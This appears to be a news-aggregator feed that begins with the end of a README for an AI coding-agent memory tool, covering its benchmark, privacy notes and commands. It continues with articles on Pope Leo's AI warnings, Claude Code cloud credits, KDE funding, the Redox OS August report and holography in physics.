  4. Write one line. On save, a small LLM (or a deterministic extract, with no LLM key) writes one line of at most 200 characters.
  5. Supersede the old line. If the turn replaces an existing memory, that line is tagged [superseded] … → id:new and stays in the file.

Tiers, questions, policy, contradictions, recall and audit: docs/how-it-works.md .

Benchmark

66 held-out turns, all seven deciders given the same state, 2026-09-23 ( method, regression set, pricing, p95, retries ):

Decider save/skip save+kind contradictions p50 $/decision
GPT-6 Astra 98.5% 98.5% 5/5 3,469 ms $0.007489
GPT-6 Luna 93.9% 93.9% 5/5 2,927 ms $0.000089
Claude Fable 5.1 95.5% 95.5% 5/5 4,290 ms $0.013256
Claude Opus 5.5 97.0% 97.0% 5/5 2,784 ms $0.005186
Gemini 3.8 Flash 92.4% 92.4% 5/5 2,850 ms $0.001174
Grok 4.7 90.9% 90.9% 4/5 3,320 ms $0.004602
jevmem auto 98.5% 95.5% 5/5 300 ms $0.000127

The 0.30 s is the Jev API decision; through a real Stop hook process, Node start-up included, it is 0.6 s end to end ( cost and latency ).

On 66 held-out turns, jevmem's median decision took 0.30 s, against 2.8–4.3 s for six current LLMs. Its accuracy was within the LLMs' range: 98.5% save/skip (tied with GPT-6 Astra for highest) and 95.5% save+kind, against 90.9–98.5% for the LLMs. GPT-6 Astra (98.5%) and Claude Opus 5.5 (97.0%) were more accurate on save+kind; Claude Fable 5.1 tied; GPT-6 Luna, Gemini 3.8 Flash and Grok 4.7 were less accurate. It found 5/5 contradictions, as did five of the six LLMs. GPT-6 Luna was cheaper ($0.000089 against $0.000127) but less accurate (93.9%) and about 10× slower. This is a single run, and differences of one or two turns are within run-to-run noise. If the most accurate decision matters most, GPT-6 Astra or Claude Opus 5.5 are better, at about 40–60× the cost per decision and 9–12× the latency. jevmem is for when you want a fast, cheap decision on every message.

Privacy

  • Sent to TypeSafe AI: the user message of each turn (and the assistant reply for questions and bug reports), the previous two turns, and your memory lines, to be scored. No telemetry. If you set an OpenAI or Anthropic key, the text of a saved turn also goes to that provider to write the line.
  • Scrubbed first: common credential shapes (API keys, tokens, *_PASSWORD= style pairs, connection-string passwords, private keys), email addresses and 16-digit numbers; names, phone numbers and addresses are not caught.
  • Zero-retention flag: jevmem can send zeroDataRetention: true (automatic for Vercel AI Gateway URLs); whether it applies depends on the gateway and TypeSafe's terms, and jevmem does not verify it.

Exactly what is sent, stored and scrubbed: SECURITY.md .

Honest limits

  • Early: v0.4; both eval sets were written by the author, and neither is an independent benchmark.
  • Not the most accurate: GPT-6 Astra and Claude Opus 5.5 scored higher on save+kind; jevmem's edge is speed and cost.
  • Recall quality is not measured: that relevant lines are injected is tested; whether answers get better is not.
  • Long-run drift is not measured: the harness covers five-turn sessions, not weeks of use.
  • Automatic capture is Claude Code only (and Codex while jevmem watch runs); Cursor and Claude Desktop save only when the agent calls add_memory .
  • Jev outages drop turns: each Jev call has a 2 s budget; when the API is slow or down, the turn is skipped and logged in .jevmem/log.jsonl , not retried later.

Commands

jevmem init [--tool claude|cursor|codex|claude-desktop|all] [--no-hooks] [--command "<cmd>"]
jevmem hook                                    Hook entrypoint; reads the Claude Code hook JSON on stdin
jevmem daemon [status|start|stop]              Warm Jev client used by the hook (auto-started, exits when idle)
jevmem watch [--replay] [--once]               Capture turns from Codex's session log for this project
jevmem mcp [--root <dir>]                      Stdio MCP server
jevmem audit [--dry-run]                       Re-score every memory against the repo, flag [stale?]
jevmem search <query> [--limit N]              Rank memories by relevance
jevmem list [--all]                            Print memories
jevmem add <kind> <text>                       Add a line by hand (secrets scrubbed; no Jev check)
jevmem why <id|hash>                           Every Jev answer behind a line or a skipped turn
jevmem right <id|hash>                         Label a decision as correct
jevmem wrong <id|hash> [--should-be <kind|none>]   Label a decision as wrong
jevmem missed "<text>" [--kind <kind>]         Label a turn that should have been saved
jevmem fit [--dry-run] [--force]               Refit weights and thresholds from labels (needs 40+)
jevmem stats                                   Latency p50/p95, cost per day, cache hit rate, escalation rate, labels, last fit
jevmem log                                     Per-label latency, token and cost summary of .jevmem/log.jsonl

Every command accepts --help . Set JEVMEM_VERBOSE=1 for a one-line latency/cost summary after every hook run.

Links

Pope Leo warns of AI threat to humanity at start of three-day France visit

Guardian
www.theguardian.com
2026-09-25 12:01:10
Pontiff says artificial intelligence must remain at service of people in first official papal visit to country in 18 years Pope Leo has warned against losing humanity in a “paradise of machines” as he addressed global concerns over the dangers of artificial intelligence at the start of a three-day v...
Original Article

Pope Leo has warned against losing humanity in a “paradise of machines” as he addressed global concerns over the dangers of artificial intelligence at the start of a three-day visit to France.

“If we are to avoid losing our humanity amid a paradise of machines invading and conditioning our daily lives, there is an urgent need for people to be educated in ethical discernment, capable of seeing what is morally right,” he said in a speech at the Elysée.

At a second address on Friday, the 71-year-old head of the Catholic church insisted that new technologies must “remain at the service of the human person rather than becoming yet another instrument of domination and injustice” in remarks to a gathering at the Paris headquarters ⁠of the UN culture and education body, ⁠Unesco.

“Every science risks losing its proper meaning when pursued without ethics,” he said. “Certain artificial systems have even been given the name of our human faculty of thought: intelligence. At the same time, however, our ideas and relationships risk being impoverished by a process of dehumanisation.”

He added: “While intelligence is attributed to computational systems, we struggle to recognise the inalienable dignity of human persons whose lives are judged according to the criterion of efficiency and when deemed no longer productive, rejected and discarded.”

Leo also criticised world leaders who disrespect the ⁠rule of ⁠law, without naming individuals. “Instead of ​respecting ‌the law, ‌those in power invoke ‌it when it serves their interests and disregard it when it restrains them, treating even justice itself ‌as though it were a commodity to be ​bought and sold,” he said.

Leo, who became pope in 2025, ⁠has been critical of the direction ​of ​global leadership in ​recent months. He ​said ‌the world was “being ​ravaged ​by a handful of tyrants” last April.

Macron walks the pope past a line of people inside building with exterior visible behind through doorway
Pope Leo with the French president, Emmanuel Macron, and his wife, Brigitte Macron, at the Elysée. Photograph: Maurizio Brambatti/AP

The first official papal visit to France in 18 years comes as Emmanuel Macron’s decade in office draws to an end ahead of next spring’s French presidential election, for which the far-right, anti-immigration Marine Le Pen is polling high. Pope Francis did not make a full state visit to France during his 12-year pontificate and refused to join the inauguration of the rebuilt Notre Dame Cathedral in 2024.

After France passed legislation in June granting some adult patients the right to assisted dying , the pontiff said he was concerned by trends “that risk turning science and technology into profit-driven ventures promoting genetic manipulation, surrogacy, the trade in human organs or the possibility of arranging one’s own death.”

A key moment of the three-day visit will be a giant outdoor mass on Saturday, led by the pontiff at Place de la Concorde.

The pope, whose paternal grandmother was born in France, on Friday urged Paris to remain a “tireless champion of peace” worldwide. On Monday, he will deliver a speech on European peace in the eastern city of Metz as Russia’s full-scale invasion of Ukraine continues into its fifth year.

Leo called on the world not to ⁠become indifferent to the pain caused by “the scourge of war”.

He told Macron and other French politicians: “I urge you '… never to grow resigned to the prospect of war or to ⁠consider it ‘inevitable’.”

Leo will also visit Lourdes, a pilgrimage site for Christians worldwide, where he will privately meet seven victims of clerical sex abuse. After some survivors’ groups suggested a larger number of survivors should have been canvassed, the Catholic church said the pontiff was seeking in-depth dialogue with individuals.

France’s Catholic bishops’ conference has agreed to provide compensation after a 2021 report estimated 330,000 children were sexually abused over 70 years by priests or other church-related figures in France. The report described a “systemic” cover-up by church officials.

In recent years, further accusations have emerged, including against workers at the elite Catholic boarding school, Bétharram , near Lourdes.

On his flight to Paris, Pope Leo told reporters they were welcome to cover him, as he responded to the Trump administration’s attempt to bar US media from the White House and affirmed the importance of journalists covering public figures.

Asked by a CNN reporter about Donald Trump’s attempt to bar CNN and other reporters, Leo said the media were welcome on his plane. “I am very happy that here, you are all welcome,” he said.

Anthropic rolls out up to $250 in free Claude Code credits, but only for cloud sessions

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 12:00:00
Anthropic now allows you to run Claude Code via cloud sessions without signing up for the research preview, and it's offering up to $250 in free usage credits, so more users can give it a try. [...]...
Original Article

Claude

Anthropic now allows you to run Claude Code via cloud sessions without signing up for the research preview, and it's offering up to $250 in free promotional credits.

Cloud sessions run Claude Code on Anthropic's infrastructure instead of your own computer, so you can start a task, leave it running remotely, and return later to review the work.

"Cloud sessions run on Anthropic-hosted infrastructure, so the work keeps going even without your computer running," Anthropic explained.

In our tests, we observed that you can start a cloud session from claude.ai/code , the Code section of the Claude mobile app, the desktop app, or the CLI using claude --cloud .

Claude Code's cloud sessions have been available to some users via research preview, but now they're officially available to eligible subscribers, and Anthropic is offering free usage credits to encourage existing subscribers to try them.

Anthropic explains how you can claim free credits

Anthropic is giving eligible Pro users $100 in promotional cloud-session credits, while Max subscribers get $250.

However, it is worth noting that the credits are separate from normal Claude usage limits and are applied automatically when you start a cloud session.

"If you hit a limit locally, keep going in the cloud until your credit runs out," Anthropic said.

If you like the idea of Claude Code's cloud sessions, you can claim the offer from Claude's website by October 7, and any remaining balance expires on November 4.

Claude Code
Claude is offering $250 free credits
Source: BleepingComputer

Once the promotional balance is exhausted, cloud sessions go back to counting against your normal plan limits. There's no separate charge for the cloud container itself.

The offer is limited to individual Pro and Max subscribers who had an active subscription when the promotion began on September 23.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

[$] How KDE got funding to add enterprise features

Linux Weekly News
lwn.net
2026-09-25 11:59:55
The Sovereign Tech Agency (STA) is investing nearly €1.3 million in KDE through 2027. At Akademy 2026 in Graz, Austria, Nate Graham and Kevin Ottens, two of the contributors who helped bring in the investment, explained how the funding was secured, provided tips on how projects should approach organ...
Original Article
The page you have tried to view ( How KDE got funding to add enterprise features ) is currently available to LWN subscribers only. Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on October 8, 2026)

This Month in Redox - August 2026

Lobsters
www.redox-os.org
2026-09-25 11:59:24
Comments...
Original Article
By Ribbon and Ron Williams on

Redox OS is a complete Unix-like general-purpose microkernel-based operating system written in Rust. August was a very exciting month for Redox! Here’s all the latest news.

Sorry for the delayed report, a combination of busy development, time off, conference attendance, other work, and various random factors got in the way.

If you would like to support Redox, please consider donating or buying some merch!

More Boot Fixes

Wildan Mubarok improved UEFI compatibility, which allowed the MSI Modern 14 C7M laptop to boot!

ARM64 Multi-core Support

lbecher implemented multi-core support for AArch64/ARM64, and made some fixes. More testing need to done to determine the extent of the performance improvements.

Ring Buffer Communication For More Parallelism

After some months of work Ibuki Omatsu and Anhad Singh implemented a ring buffer communication API (Redox Rings) equivalent to Linux io_uring system call API to improve performance on supported drivers, with guidance from 4lDO2 and help from Wildan Mubarok to fix bugs.

This work improves the I/O performance for the NVMe driver, RedoxFS and RAMFS by a significant factor. In the benchmark below (bypassing the RedoxFS file system) it’s measured to improve I/O performance by 14-15x!!

  • redox_syscall (using synchronous system calls to measure NVMe read/write performance) and redox_ring (using ring buffers to measure NVMe read/write performance) benchmark comparison

redox_syscall (synchronous system call NVMe read/write performance) and redox_ring (ring buffer NVMe read/write performance) benchmark comparison

  • In-memory filesystem (ramfs) benchmark using ring buffers

In-memory filesystem (ramfs) benchmark using ring buffers

Significant Native Compilation Performance Improvement and OOM Fixes

After months of investigation by Wildan Mubarok on gradual GCC compilation performance degradation, he found and fixed a kernel memory leak that was causing the os-test test suite compilation time in GCC (on QEMU) to increase from 2 hours up to 10 hours, and causing out of memory (OOM) errors. Once fixed, the compilation time was reduced from 10 hours to around 30 minutes.

NUMA Support

Aadarsh (aka EuclidDivisionLemma) implemented the initial support for NUMA -based memory management. As we currently use QEMU to test NUMA behaviour, any help to test on real hardware would be much appreciated.

He also implemented local node allocation (locality of data) by default and a libredox API to modify NUMA allocation policies.

Process Priority Support Conclusion of the Scheduler Improvements RSoC project

Akshit Gaur implemented support for process priorities and system priority tuning, which improved general performance.

He also wrote the last EEVDF article giving the complete explanation after optimizations. Thanks a lot Akshit for the great work!

QEMU on Redox!

Ribbon and Wildan Mubarok confirmed/tested that QEMU is working on Redox. Ribbon tested the server variant of Redox in QEMU terminal mode and Wildan tested the desktop variant including the GTK frontend.

Redox does not yet have support for KVM-like virtual machine acceleration, so performance can be significantly slow.

  • Redox server variant on QEMU terminal mode above Redox desktop

Redox server variant on QEMU terminal mode above Redox desktop

  • Redox server variant on both QEMU terminal and GTK GUI

Redox server variant on both QEMU terminal and GTK GUI

  • Redox desktop variant on QEMU GTK GUI

Redox desktop variant on QEMU GTK GUI

Dual-boot Installation from Linux!

Wildan Mubarok improved the Linux support of Redox installer to allow a dual-boot installation of Redox, you can see this page to learn how to use it and the new GUI installer options.

  • Redox running on triple-boot

Redox running on triple-boot

Kernel Binary Size Profiling

4lDO2 implemented support for kernel binary size profiling to measure where it can be reduced, also reducing memory usage.

Kernel binary size flamegraph

Current File Access Design using Namespaces and Capability-based Security

Ibuki Omatsu created a diagram that summarizes how the openat function is used to resolve paths, using the namespace manager, as part of capability-based security. Read this for more details.

File access design diagram using namespaces and capability-based security

Better relibc Contribution Philosophy and Goals

4lDO2 documented the relibc safety philosophy and goals (for our POSIX/C Standard Library) to reduce the probability of undefined behavior and logic bugs being introduced. This primarily focuses on restricting unsafe code to the “leaf functions” of relibc for better oversight/review and less unsafe code in unexpected places. It also includes using more Rust-like error handling internally, to give more information than POSIX errors (easing the investigation of certain classes of bugs).

Kernel Improvements

  • (kernel) 4lDO2 reduced IPC overhead by 5%
  • (kernel) 4lDO2 reduced binary size by 2.2% by removing DTB code when not reached (x86-64 image, for example)
  • (kernel) 4lDO2 merged the redox_syscall library code into the kernel repository to ease changes
  • (kernel) Akshit Gaur did more improvements and fixes to EEVDF scheduler work stealing and Wildan Mubarok did some fixes, which improved performance
  • (kernel) Aadarsh (aka EuclidDivisionLemma) improved memory deallocation performance by reducing thread locking
  • (kernel) Aadarsh (aka EuclidDivisionLemma) fixed a panic in NUMA code
  • (kernel) Wildan Mubarok moved all scheme path handling to user-space
  • (kernel) Wildan Mubarok fixed a potential bug where process killing could create zombie processes
  • (kernel) Wildan Mubarok fixed a panic in FUTEX_WAIT64 system call

Driver Improvements

  • (driver) MJ Pooladkhay implemented PCI multi-vector MSI-X support, which will allow more driver performance features
  • (driver) MJ Pooladkhay fixed VirtIO device completions being lost
  • (driver) Wildan Mubarok fixed a pcid bug that Clippy detected
  • (driver) bjorn3 did some code deduplication and cleanup

System Improvements

  • (sys) Ibuki Omatsu implemented multi-threading support for schemes
  • (sys) Wildan Mubarok ported rldd to be our ldd tool implementation
  • (sys) Wildan Mubarok improved the scheme path parent gathering performance
  • (sys) Wildan Mubarok fixed some off-by-one file locking bugs, which helped SQLite and libsoup
  • (sys) Wildan Mubarok removed the a inputd non-fatal panic when no display is available
  • (sys) bjorn3 fixed potential inputd deadlocks
  • (sys) bjorn3 did some code deduplication

Relibc Improvements

  • (libc) 4lDO2 moved most of unsafe socket and getaddrinfo function code to leaf functions to reduce bugs by using concentration for much better readability
  • (libc) 4lDO2 implemented the RELIBC_COMMIT_HASH environment variable to show the relibc commit hash to fully confirm if static objects were updated with local changes or up-to-date
  • (libc) Ibuki Omatsu fixed broken SCM_RIGHTS on recvmsg function, a bug that was revealed after file descriptor allocation migration to user-space
  • (libc) bjorn3 fixed the getsockname and getpeername functions address length computation, which fixed some mio library tests
  • (libc) Wildan Mubarok implemented the rlct_clone function for Linux to fix pthread tests on Linux ARM64
  • (libc) Wildan Mubarok implemented mode read (except line buffering) and write (except borrowing) support and handling in setvbuf function
  • (libc) Wildan Mubarok improved the LD_DEBUG environment variable to show the relibc shared object memory location range to greatly improve crash debugging on dynamic linking
  • (libc) Wildan Mubarok improved epoll performance by calling the open function directly
  • (libc) Wildan Mubarok reduced application and library launch time by using constant functions in stdio initialization
  • (libc) Wildan Mubarok reduced unsafe Rust code in timer_t
  • (libc) Wildan Mubarok added more Unix socket tests
  • (libc) Wildan Mubarok fixed TLS load offset on ARM64, which fixed a tokio library panic on package manager
  • (libc) Wildan Mubarok fixed 64KiB-paged ELF loading on Linux ARM64
  • (libc) Wildan Mubarok fixed the clock_getres function behavior
  • (libc) Wildan Mubarok fixed a double close bug in fstatat function
  • (libc) Wildan Mubarok fixed NUL offset in ptsname_r
  • (libc) Wildan Mubarok fixed the pthread_kill-self test
  • (libc) Wildan Mubarok fixed a time/timer test
  • (libc) auronandace implemented tcgetsid function
  • (libc) auronandace replaced SYS_DUP_INTO , SYS_READ , and SYS_WRITE system calls with SYS_CALL system call to reduce system calls
  • (libc) auronandace reduced more as casting usage to prevent problems in code refactorings
  • (libc) auronandace did some code cleanup
  • (libc) auronandace, Wildan Mubarok, and Ibuki Omatsu fixed and enforced many Clippy lints and enabled tracking them on CI
  • (libc) Ben McCann implemented POSIX base in tzset and POSIX handling in mktime functions
  • (libc) Ben McCann added more tests to tzset function
  • (libc) Sunam Kang implemented MSG_NOSIGNAL in sendto function

Networking Improvements

  • (net) Wildan Mubarok improved DHCP missing DNS error handling messages

RedoxFS Improvements

  • (rfs) Wildan Mubarok implemented O_SYMLINK to allow symlink traversal across schemes
  • (rfs) Wildan Mubarok improved partition mount error handling to show error codes

Security Improvements

  • (safe) bjorn3 implemented rootless display opening on inputd
  • (safe) Ibuki Omatsu reimplemented the contain sandbox management tool to use the new namespace management, which now creates a per-process filter scheme that holds an actual namespace file descriptor, mediating all openat function calls by providing a file descriptor filter to programs (full chroot implementation is still WIP)
  • (safe) Wildan Mubarok updated the CA certificates to be up-to-date, which also fixed GnuTLS

Packaging Improvements

  • (pkg) Wildan Mubarok fixed a double counting bug in package extraction progress bar

Desktop Improvements

  • (desk) bjorn3 ported the Orbital login manager to winit and softbuffer libraries to allow Wayland testing in the future
  • (desk) bjorn3 disabled window decorations in fullscreen Orbital windows
  • (desk) bjorn3 fixed fullscreen or maximized Orbital window resize on display resize

Installer Improvements

  • (install) Wildan Mubarok fixed the input data handling of new GUI installer options
  • (install) Wildan Mubarok added a progress status when extracting packages

Programs

  • (app) Wildan Mubarok updated GNU nano from version 7.2 to 9.2
  • (app) Aadarsh fixed the GNU Binutils GDB variant compilation
  • (app) Wildan Mubarok updated the Kibi from version 0.3.2 to 0.3.3
  • (app) Wildan Mubarok fixed WebKit TLS bugs
  • (app) Wildan Mubarok fixed the EGL support on GTK3 port
  • (app) Wildan Mubarok fixed EGL partial rendering on Mesa3D

Testing Improvements

  • (test) 4lDO2 implemented benchmark metrics on acid test suite to detect performance regressions
  • (test) Wildan Mubarok started to use and enable Clippy on CI
  • (test) Wildan Mubarok reduced the Redox image CI verification time from around 25 minutes to around 7 minutes

Build System Improvements

  • (build) Wildan Mubarok updated the Cookbook recipe target list item combination to allow --all-* options usage, for example: make r.base,--all-binaries
  • (build) Wildan Mubarok implemented the COOKBOOK_TREELESS_CLONE environment variable to enable treeless clone in all recipes to greatly save storage space and and reduce download time
  • (build) Wildan Mubarok reimplemented most of script logic in Cookbook to reduce script maintenance cost and Ribbon fixed some regressions
  • (build) Wildan Mubarok fixed the make rebuild-push command (verify recipe source or package changes, incrementally rebuild or download and push new changes) not updating the filesystem configuration recipes, now the system can be properly and quickly updated in a existing Redox filesystem image
  • (build) Konstantin Shabanov fixed the Nix flake on Podman and Native builds
  • (build) Konstantin Shabanov applied cargo fix on code
  • (build) Ribbon replaced the ls tool by tree in show-package.sh script to make it much more useful by showing all recipe package directories and files

Documentation Improvements

Website Improvements

  • (web) Wildan Mubarok added LaTeX math support and improved the website dark mode to clearly show LaTeX formulas to fix the formulas in the last EEVDF article

How To Test The Changes

To test the changes of this month download the server or desktop variants of the daily images .

Use the desktop variant for a graphical interface. If you prefer a terminal-style interface, or if the desktop variant doesn’t work, please try the server variant.

  • If you want to test in a virtual machine use the “harddrive” images
  • If you want to test on real hardware use the “livedisk” images

Read the following pages to learn how to use the images in a virtual machine or real hardware:

Sometimes the daily images are outdated and you need to build Redox from source. For instructions on how to do this, read the Building Redox page.

Programs

To test the changes on applications and libraries, see if the wanted program is available in the following lists and run the following command to install them: sudo pkg install package-name

There’s also a package web interface if you want detailed package information:

Join us on Matrix Chat

If you want to contribute, give feedback or just listen in to the conversation, join us on Matrix Chat .

Behind the Blog: Did you notice?

403 Media
www.404media.co
2026-09-25 11:58:26
This week, we discuss some small changes, an AI song, and internet soup....
Original Article

This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss some small changes, an AI song, and internet soup.

JOSEPH: We’re making a couple of changes that might sound boring to someone who doesn’t read or listen to our work, but I’m actually legit excited about them, and I think they will be better for all of you too. I’ll talk about one now and maybe the other next week.

This post is for paid members only

Become a paid member for unlimited ad-free access to articles, bonus podcast content, and more.

Subscribe

Sign up for free access to this post

Free members get access to posts like this one along with an email round-up of our week's stories.

Subscribe

Already have an account? Sign in

Gravity Seems Holographic. What Does That Mean for Reality?

Hacker News
www.quantamagazine.org
2026-09-25 11:31:02
Comments...
Original Article

Qualia: Essays that go where curiosity leads

I n my first months as a physics journalist nearly a decade ago, I kept running into an inscrutable string of characters: AdS/CFT. Thoroughly intimidated, I decided to just ignore it.

But I couldn’t keep my head in the sand for long. I soon learned that those characters are shorthand for a surprising connection between the seemingly inharmonious worlds of gravity and quantum mechanics. And even more bizarrely, this “anti-de Sitter/conformal field theory” correspondence suggests that gravity eliminates the distinction between volume and area. This broader idea is known as the holographic principle, and it now strikes me as the most profound proposal in theoretical physics in the last 30 years.

Theoretical physicists tend to vote with their feet, and AdS/CFT sparked a stampede. The three foundational papers on the topic in the late 1990s have garnered tens of thousands of citations, making them by far the most highly cited theoretical physics works of the digital era. In my interviews with physicists who study holography, they often seem genuinely stunned, and reach for words like “magical” and “miraculous” to describe it. And it doesn’t hurt that holography led to a widely accepted answer to the most famous puzzle in physics : Contrary to what Stephen Hawking argued, black holes are not inescapable prisons.

But even after covering numerous developments in holography and having countless conversations with the physicists involved, I still felt confused. I had heard that holography suggested that gravity and quantum mechanics are one and the same, and that space might be an illusion. I had also heard holography described both as a mathematical fact and as a speculative flight of fancy. So I tried to triangulate these wild ideas and figure out what, exactly, the holographic principle implies about our universe.

The Evidence

Put a box around any region of space (space-time, really, but I’m going to drop time throughout this essay for ease of visualization, as physicists often do). The holographic principle asserts that no matter what’s going on inside — from gas molecules pinging around to black holes colliding — you can decipher the entire contents of the box just by repeatedly measuring points on the surface.

Pause for a moment to reflect on how outrageous this assertion is. You can’t see into the box at all. Nevertheless, holography says that you can learn exactly what’s happening everywhere in the box without any access to the interior. Observing the surface alone is enough. In this sense, the amount of stuff that fills a box is the same as the amount of paint that covers it. That’s a violation of logic and geometry. It asks us to erase the categorical difference between square meters and cubic meters. It recalls how holographic images appear to have depth despite being flat, except the bird in the hologram is the same as an actual bird.

Bartek Czech , a theorist at Tsinghua University in China, highlights the power of the principle by comparing it to a CT scan of the brain, which uses X-rays to look inside the organ and reconstruct it from hundreds to thousands of cross-sectional images. Holography implies that you can do that — reconstruct every fold, vessel, and neuron in three dimensions — without actually looking inside. Simply photographing the surface of the brain somehow suffices.

Why would anyone entertain such a far-fetched notion? It’s rooted in thought experiments and math, and it appears to trace back to one force: “a miracle of gravity,” Czech said.

Scientists have known for more than a century that gravity is different from the other forces. Imagine a box filled with electric charges, representing one of the other fundamental forces, electromagnetism. The stuff in the box consists of the charges and the electric field they create, which also passes through the outer surface. You will have a problem if you try to infer what arrangement of charges generates the field by looking at the surface alone. Because positive charges neutralize negative charges, different arrangements can look the same. If you observe no field, it could mean there’s no charge inside — or it could mean that the effects of the positive charges are perfectly blocking the effects of the negative charges. From the surface, you can’t tell the difference.

With gravity, mass plays the role of charge. It bends space-time around it, and it is always positive. There is no negative mass, so you can always infer the one real arrangement of stuff inside from the warping of space-time at the surface of your box. “Intuitively, this is why holography is plausible,” said Laurent Freidel , a physicist studying quantum gravity at the Perimeter Institute for Theoretical Physics in Waterloo, Canada.

But holography really starts to bite only after you take the intricate details of quantum mechanics into account. The first clues came in the 1970s, when Jacob Bekenstein and Stephen Hawking calculated the entropy of black holes — typically a measure of how much stuff fits inside an object. They used quantum theory to predict how a black hole would grow as it swallowed particles. Perplexingly, as they imagined adding particles to the black hole, they found that the entropy grew in lock step with the surface area — not the volume, as you would expect.

Leonard Susskind , a physicist at Stanford University, built on their result in the 1990s and proposed that the black hole was literally a hologram, that everything happening inside can be observed from the outside. In some sense, the interior was superfluous. “I thought it was a little bit crazy,” Susskind said, “but I thought it was the least crazy of all the possibilities.” (Gerard ’t Hooft, a Nobel laureate, and Charles Thorn, a physicist at the University of Florida in Gainesville, came to similar conclusions around the same time.)

I’ve always found this black hole entropy argument compelling, because any patch of space can become a black hole if you put enough mass into it. Despite their reputation for weirdness, black holes are representative examples of space. They just have a way of bringing space’s stranger properties to the fore. So if a black hole is holographic, and any region of space can become a black hole, then, the argument goes, even the room you’re sitting in should be holographic. “It’s completely general,” Susskind said.

In the 1990s, physicist Leonard Susskind conceived of black holes as literal holograms. He determined that you could know the inside merely by measuring the surface.

Linda A Cicero/Stanford News Service

This argument has a rock-solid universality, but I’ve also heard physicists describe holography as a speculative idea with an uncertain connection to reality. So I called up Latham Boyle , a physicist at the Higgs Center for Theoretical Physics at the University of Edinburgh, hoping for an alternative view. He did not disappoint.

Boyle doesn’t dispute Bekenstein and Hawking’s black hole findings, but he does question the holographic interpretation. He suspects that the act of putting a surface around a region of space — as happens when a black hole forms — creates two distinct types of entropy. One entropy tells you how many particles can fit inside — and that really does depend on the volume. The existence of the surface gives you a second, “entanglement” entropy . Particles inside share a quantum connection, known as entanglement, with those outside; the bigger the surface, the more entanglement crosses it. The entanglement entropy depends on the area, not the volume. They’re not, Boyle posits, the same thing.

“That seems like a less mystical, more down-to-earth interpretation of what’s going on,” he said.

But it helps holography that there is a second, more conceptually airtight finding behind it: AdS/CFT.

AdS/CFT asks us to imagine a universe that is not like our own, one that curves in such a way that its infinite expanse of space can be pictured as fitting inside a finite snow globe. That might sound like a big ask, but it’s one that mathematicians — and mathematically minded artists such as M.C. Escher — are perfectly comfortable with. This geometry is known as anti-de Sitter (AdS) space.

Other than its peculiar curvature, the interior of the anti-de Sitter snow globe is a lot like our universe, filled with electrons and atoms. More importantly, it also ripples in response to that matter, providing the effect of gravity. The snow globe’s surface, meanwhile, is a universe of its own. It’s also populated with quantum particles, but it’s rigid, so it can’t react to the particles: no gravity. This surface world is ruled exclusively by a type of quantum theory known as a conformal field theory (CFT), where the rules of physics don’t change as you zoom in or out.

The blockbuster trilogy of papers in the late 1990s showed that, mathematically, these two theoretical worlds (the AdS interior and the CFT surface) are the same . This is the AdS/CFT correspondence. As with the black hole entropy argument, the volume and surface are equivalent. But unlike the black hole argument, AdS/CFT is essentially a mathematical fact about gravity and quantum mechanics with no alternative interpretation. Even skeptics find this genuinely surprising. “I don’t know of any mundane way to explain it,” Boyle said.

The undeniable message of AdS/CFT is that, at least in this special snow globe, the rules of gravity and the rules of quantum mechanics are secretly describing the same game — despite the storied antagonism between the two theories. “Far from being opposed, they’re actually intertwined,” said Brian Swingle , a physicist at Brandeis University. “One emerges from the other.”

The correspondence came as a shock. I think of it as akin to discovering a way of converting any checkers move into a valid chess move: Why on Earth would that work? When I ran that picture by Sebastian Mizera , a physicist at Columbia University who studies the mathematical structure of quantum theories, he told me it wasn’t dramatic enough. “That’s a good analogy,” he said, except “it’s more like checkers and basketball.”

But does the holographic nature of the snow globe tell us anything about our reality? On this point, physicists disagree. Skeptics emphasize that our universe is the opposite of a snow globe. The accelerating expansion of the cosmos implies that we live in a space that curves outward, in the opposite direction — a de Sitter space. Because our space does not curve back in on itself, it has no boundary surface where you can project the hologram. So there’s little reason to think that AdS/CFT has anything to do with the real world.

The most dedicated holographers, however, take a ground-level perspective. An ant living deep inside the snow globe can’t easily detect any curvature, and therefore can’t tell the difference between anti-de Sitter and de Sitter space. So perhaps what’s true of one space, they argue, should more or less hold for the other. (And in case you were wondering, we’re the ants.)

While both arguments have merit, I lean toward the holographers. Black holes provide intriguing but circumstantial evidence that all types of space are holographic. And the AdS/CFT correspondence essentially guarantees that anti-de Sitter space — which happens to be the space physicists understand best — is holographic. What are the odds that our universe works in a totally different way? It absolutely could, but I wouldn’t bet on it. I take seriously the possibility that gravity makes every kind of space, including ours, holographic.

And so what would it mean for us to live in a hologram?

The Meaning(s)

I found that most physicists are hesitant to speculate about the connection between the holographic nature of space and “ontology” — the capital-T truth about what’s real.

“I don’t try to answer that question,” Susskind said. “That’s beyond my pay grade.”

This strikes me as a prudent response, one that stays true to the ultimate goal of physics, which is not, as I am often tempted to think, to explain what is real. Rather, physicists seek to identify a few simple concepts, expressed in mathematical relationships, that make reliable predictions in many different situations. Gravity is a powerful concept because it holds for falling apples, sloshing tides, and orbiting planets. Holography is another step in that tradition, an equivalence between area and volume that holds at least for certain spaces.

“Physicists build models,” Czech said. And it’s exciting that holographic models are even possible to build.

But I craved something more intuitive, less prudent. I wanted to know what holography would mean for us if we lived in anti-de Sitter space (which we don’t), or if physicists developed a holographic theory of de Sitter space (which they haven’t). When I framed the question in that way, Vijay Balasubramanian , a physicist who studies holography at the University of Pennsylvania, gamely laid out a short menu of possibilities.

If our universe ultimately has just one nature (as opposed to multiple equivalent natures, which Balasubramanian said is possible), then there are three options: The quantum surface is the real thing, the gravitational volume is the real thing, or something else is the real thing.

The first interpretation — the surface is real — is the most popular among physicists who spend their time studying AdS/CFT. They suspect that the space we experience is as illusory as water. If you look closely enough at the smooth, clear liquid, it resolves into ricocheting molecules — the “real thing.” Similarly, if you were to look at our universe closely enough, you’d find that it’s emptier than it seems. In this scenario, we would resemble characters in a video game. The apparently bulky buildings and trees of the 3D game world around us would actually be pixels flickering on a flat screen.

